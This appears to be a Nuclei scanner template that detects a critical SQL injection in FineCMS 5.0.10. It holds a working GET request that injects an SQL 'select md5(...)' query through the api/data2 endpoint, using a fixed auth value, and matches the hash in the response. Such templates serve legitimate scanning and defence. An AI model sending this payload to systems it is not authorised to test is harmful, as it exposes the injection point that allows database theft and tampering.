id: finecms-sqli info: name: FineCMS 5.0.10 - SQL Injection author: ritikchaddha severity: critical description: | FineCMS 5.0.10 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://blog.csdn.net/dfdhxb995397/article/details/101385340 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-89 tags: finecms,sqli variables: num: "999999999" requests: - method: GET path: - '{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5({{num}})%27' matchers: - type: word words: - '{{md5({{num}})}}' # Enhanced by mp on 2022/09/28